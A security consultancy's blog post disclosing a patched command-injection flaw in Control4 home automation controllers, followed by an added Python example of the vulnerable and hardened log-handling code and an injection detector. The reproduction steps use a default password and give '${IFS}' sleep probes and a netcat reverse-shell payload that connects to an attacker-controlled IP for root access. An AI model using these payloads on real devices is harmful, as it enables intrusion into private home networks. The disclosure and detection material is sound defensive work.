Aon’s Cyber Secure Select offers products and services that help protect the assets of executives, high-net-worth individuals, and their families. The Executive Vulnerability Assessment is a personalized security vulnerability evaluation meant to assess and improve an individual’s security posture. Continuing our APT X series, this blog post provides a small insight into what happens behind the scenes during the home network penetration testing phase of an Executive Vulnerability Assessment by demonstrating what a real-world Advanced Persistent Threat attack against an individual might look like. This includes the details of a zero-day vulnerability discovered and leveraged during an actual assessment.
Executive Vulnerability Assessments help our clients better understand their personal attack surface. Ultimately, this helps our clients protect themselves against targeted attacks that may lead to the unauthorized disclosure of sensitive personal or corporate information that may be accessible from an executive’s home network.
In this type of engagement, the initial foothold within the network of a high-net-worth individual is often obtained by targeting devices used by their family members. Online reconnaissance is performed to identify the types of technology the family may use, followed by the deployment of some preliminary payloads to improve situational awareness of the victim’s environment before more complex payloads are sent. Social engineering is the primary technique used to deliver these payloads to the victim(s) and, upon successful execution, an initial foothold is established within the home network. In some cases, wireless attacks are viable and provide an easy initial foothold within the home network as well.
During an engagement last summer, after establishing an initial foothold within the executive’s network, we discovered a zero-day vulnerability affecting Control4 home automation systems running firmware versions prior to 3.2.0, such as the EA-1 and EA-3 Entertainment and Automation Controller devices. This vulnerability gave the attacker remote code execution as the root user on the underlying operating system. The issue was disclosed to Control4, who responded that they were already aware of it and that a fix was in beta at the time. Nevertheless, they thanked us for the report. Control4 has since informed us that the vulnerability has been remediated in firmware version 3.2.0, released in October 2020. Neither Aon nor Control4 is aware of any exploitation of this vulnerability in the wild, and we would like to commend Control4 for quickly patching the issue. Users of affected systems are advised to contact a certified Control4 dealer to arrange a firmware update. If this is not possible, we recommend placing affected devices in a separate network segment that is isolated from high-value devices.
Vulnerabilities in entertainment systems and other IoT devices can often yield a potent foothold within a home network. In this case, we utilized this vulnerability, as well as a few others, to establish long-term persistence within multiple hosts inside the network.
Due to the increasing prevalence of IoT devices, it becomes critically important for individuals to implement positive security practices in their own households. The following non-exhaustive list contains some suggestions:
The following section provides in-depth technical details of the remote code execution vulnerability discovered during the assessment.
Control4 Entertainment and Automation Controller devices such as the EA-1 and EA-3 have a management interface implemented as a web application. This management interface provides a feature that allows authenticated administrators to view the device’s log files. The log retrieval functionality in firmware versions prior to 3.2.0 is vulnerable to remote code execution via command injection. The following steps describe how to reproduce this vulnerability on the affected devices.
1. Open the device’s administrative interface in a web browser and log in as the System Admin user.
2. The System Admin password was not initially known during this assessment, but the targeted device still had the default password set for that account. This credential can be found at this public site: http://open-sez.me/passwd-control4.htm
3. After signing in, the Home screen will be displayed. Click on System Manager.
4. In the System Manager screen, click on a device under Discovered Devices.
5. After selecting a discovered device, click on Logging.
6. Under Logging, click on the name of a log file to retrieve. In this case, lighttpd was selected.
7. The following page will be displayed with an error message indicating that the /var/log/lighthttpd.log file does not exist.
8. Using a proxy tool such as Burp Suite, examine the HTTP request made to obtain the lighttpd.log file and the error message returned in the response. The error message discloses the operating system command that was executed in order to retrieve the lighttpd.log file.
9. Using Burp Suite, manipulate the previous request to inject a call to the sleep command with a duration of 6 seconds and check the request response time. The injected payload in this case was ‘&sleep${IFS}6&’.
10. In order to confirm that the sleep command successfully executed, manipulate the same request again but this time change the sleep duration to 7 seconds. The response time should be approximately 7 seconds as seen in the screenshot below. The injected payload in this case was ‘&sleep${IFS}7&’.
11. For a full remote shell as the root user, use the following payload replacing IP_ADDRESS with the public IP address of a server you control, which has a netcat listener running on port 4444. The injected payload should look like the following:
'&nc${IFS}IP_ADDRESS${IFS}4444${IFS}-e${IFS}${SHELL:0:1}bin${SHELL:0:1}sh&'
Note that the same process applies to obtain RCE on Control4 EA-1 devices using the same firmware version.
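The root cause behind steps 8 to 11 is a log name from the request being placed into a shell command string. The following is an added example, not code from the original post or from Control4's firmware: it shows that vulnerable pattern beside a hardened handler that validates the name against an allowlist and reads the file without a shell, plus a check that flags the ${IFS} style probes in web server access logs. The query parameter name, the log allowlist and the access-log lines are constructed assumptions.

```python
import re
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Constructed example (not Control4's code) modelling the bug class on this page.
LOG_DIR = Path("/var/log")
ALLOWED_LOGS = {"lighttpd", "syslog", "director"}  # hypothetical allowlist
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")

def build_log_command_vulnerable(log_name: str) -> str:
    """Vulnerable pattern: one shell string, so '&', '$' and friends are live."""
    return f"cat {LOG_DIR}/{log_name}.log"

def is_valid_log_name(log_name: str) -> bool:
    """Hardened check: strict character set AND membership in a fixed allowlist."""
    return bool(SAFE_NAME.match(log_name)) and log_name in ALLOWED_LOGS

def resolve_log_path(log_name: str) -> Path:
    """Map a validated name to a file path; no shell is involved at all."""
    if not is_valid_log_name(log_name):
        raise ValueError(f"unknown log: {log_name!r}")
    path = (LOG_DIR / f"{log_name}.log").resolve()
    if path.parent != LOG_DIR.resolve():  # defence in depth against traversal
        raise ValueError("path escapes log directory")
    return path  # callers read it with path.read_text(), never via a shell

# Detection side: shell metacharacters or the ${IFS} / ${SHELL:0:1} substitutions.
INJECTION_MARKERS = re.compile(r"[;&|`$\n]|\$\{IFS\}|\$\{SHELL")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_suspicious_requests(access_log_lines, param="log"):
    """Return (line_no, decoded_value) for requests whose `param` looks injected.
    `param` is a hypothetical query-parameter name; adjust to the real interface."""
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in query.get(param, []):
            if INJECTION_MARKERS.search(value):
                hits.append((n, value))
    return hits

# Constructed access-log lines: a benign request, then the step 10 sleep probe URL-encoded.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Jul/2020:10:00:00 +0000] "GET /logs?log=lighttpd HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Jul/2020:10:00:07 +0000] "GET /logs?log=lighttpd%26sleep%24%7BIFS%7D7%26 HTTP/1.1" 200 88',
]
```

The response-time gap between the two constructed lines (7 seconds) is the same signal the steps above use to confirm injection, so a latency check on this endpoint is a useful second detector.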